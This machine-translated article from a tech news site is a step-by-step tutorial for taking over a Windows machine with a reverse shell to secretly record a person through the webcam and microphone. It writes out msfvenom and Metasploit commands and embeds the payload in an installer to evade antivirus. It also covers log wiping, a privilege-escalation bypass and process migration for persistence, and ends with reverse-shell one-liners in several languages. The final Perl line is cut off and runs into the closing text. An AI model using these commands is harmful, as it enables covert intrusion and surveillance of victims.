Shulou(Shulou.com)06/02 Report--

This article is about how to use reverse Shell to control the camera. Xiaobian thinks it is quite practical, so share it with everyone for reference. Let's follow Xiaobian and have a look.

If you've taped off your webcam, you've probably heard that hackers or the NSA can spy on you remotely. So the question is, how do these people you've never met remotely connect to your machine and spy on you?

This could be because you exposed your CCTV, IP cameras publicly on the Internet, and attackers found them on websites like Shodan. This, combined with the fact that you haven't changed their default passwords and bam, allows attackers to take control of your camera and monitor your every move.

These are the most common security issues with IoT cameras. But if it's a built-in webcam, then the more likely explanation is that an attacker hacked into it via the Meterpreter payload and took control of it. An attacker using Meterpreter can obtain a reverse shell, which is also discussed in this article. For more information on Metepreter, see: www.offensive-security.com/metasploit-unleashed/about-meterpreter/

Here, you may have a question. Why wouldn't an attacker access your machine directly, but rather through a reverse shell? The reason is simple, because direct access is likely to be blocked. Inbound traffic is more susceptible to throttling than outbound traffic. On the other hand, if we actively connect, then the target machine is more likely to release the traffic. This is because the target machine wants to establish a connection with our machine.

msfvenom is a framework that we will use to get a reverse shell. It is pre-installed on Parrot and Kali. First, let's run the following command to create the Metepreter reverse TCP shell payload.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 -platform windows -f exe LHOST=192.168.X.X LPORT=4444 -o /home/parrot/name.exe

Once created, let's upload it now... blocked。This is because the MeterPreter payload has a reputation and is already marked by various security software, so most security software can detect and block/isolate it.

We can try using a tool called Sheller to change its hash and embed the reverse shell in another file. The reason you chose to embed the shell in an installation file is because most installation files need to be run as an administrator. As you'll see later, running an exploit as an administrator can save us a lot of trouble.

You can activate it directly through the shelter. It is also pre-installed on Parrot and Kali.

Let's use Auto [A] and locate the executable I created for this example.

Next, we select the reverse TCP shell and enter the IP and port of our machine (attacker). When done, it embeds the shell into the exe file of your choice so you can upload it to the target machine. Now you need a way to put it on the target machine, but for this example I'll copy and paste.

Even though we hid the Metepreter shell, AV managed to detect it. For the sake of our demonstration, we'll turn AV off for now. Of course, in real life scenarios, attackers can't be as casual as I am. They are more likely to defeat AV through technical means or create a payload that cannot be detected by the target.

However, despite shielding the Meteorpreter enclosure, AV managed to detect it. I'm going to turn it off right now because I can. In the real world, attackers would disable or blind AV so they could lower the payload.

Now, let's run it.

Before we get started, let's load msfconsole (Metasploit) on the attacker and run the following command:

msfconsoleuse multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.X.Xset LPORT 4444run

Your session will listen on the port and IP specified in the reverse shell script. Now let's run exploit as user:

As you can see on the right, we had several instances where session setup failed. This is why I mentioned earlier why users are required to run as administrators. That way you can run and inject all scripts and DLLs smoothly. If the user is running as an administrator, you will not see any failures. As follows:

Having successfully obtained the reverse shell, we are now ready to perform the desired action on the target machine. If your target is a camera, you can do the following:

Show Webcams: webcam_listWebcam Snap Help: webcam_snap -hTake a Picture and don't load the image after: webcam_snap -i 1 -v falseRecord audio: record_micRecord Webcam: run webcam -p /var/www/Stop recording: run webcam -s

It's not just webcams. There are many other commands you can execute. Example: Clear all logs (application, system and security logs): clearev

This is just one example, and it is unlikely that hackers will run it. Because doing so would alert the administrator. If you find that all logs have been erased from a machine, you can assume that someone has already used it. Instead, attackers are more likely to delete selected events to cover their tracks.

All of this requires administrator privileges, and your users may not be able to run it with elevated privileges. Well, you can use commands like bypass_comhijacker. First, you still need to get a normal user-level reverse shell.

Once you have the shell, type background and press Enter. This will move the current session to the background. You can then use the bypass_comhijack exploit against the current session, as follows:

You can then go back to the original session and run the following command:

After successful execution, you will get an admin shell. In order to establish a long-term stable backdoor connection with the target machine, we need to hide our reverse shell in a more covert and stable process (rather than a Putty exe or installer file) because once these apps are closed, our connection will be lost. That's why we need to migrate our reverse shells as soon as possible to those that can run continuously.

First, let's look at what processes are running.

After finding a relatively stable process, run migrate [PID]

It then migrates your Metepreter session to another process. This way your session will be preserved even if they close the exploited app.

As you can see, Meterpreter is very powerful. But that's not the only way you can get a reverse shell. You can also use Netcat. Compared to Metepreter, some AV vendors do not see it as a threat. You can click here to see the results in virustotal.

You can find Netcat on Parrot or Kali under usr/share/windows-binaries/nc.exe After uploading nc.exe to the target machine, we can run nc.exe [Attacker IP] [Port] -e cmd.exe.

On the attacker machine we need to listen for connections, which can be done by running nc -lvp [Chosen port] command.

You'll get a simple reverse shell with normal user rights, which is a good start for you. Then, you can use it to further exploit the system to gain administrator privileges. Here are some examples of running a reverse shell:

PHP

php -r '$sock=fsockopen("192.168.0.10",1234);exec("/bin/sh -i &3 2>&3");'

Bash

bash -i >& /dev/tcp/192.168.0.1/8080 0>&1

Netcat Linux

nc 192.168.0.10 1234 -e /bin/sh

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Perl

perl -e 'use Socket;$i="192.168.0.10";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))){open(STDIN,">&S");open(STDOUT, thank you for reading! About "how to use reverse Shell control camera" this article is shared here, I hope the above content can have some help to everyone, so that everyone can learn more knowledge, if you think the article is good, you can share it to let more people see it!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.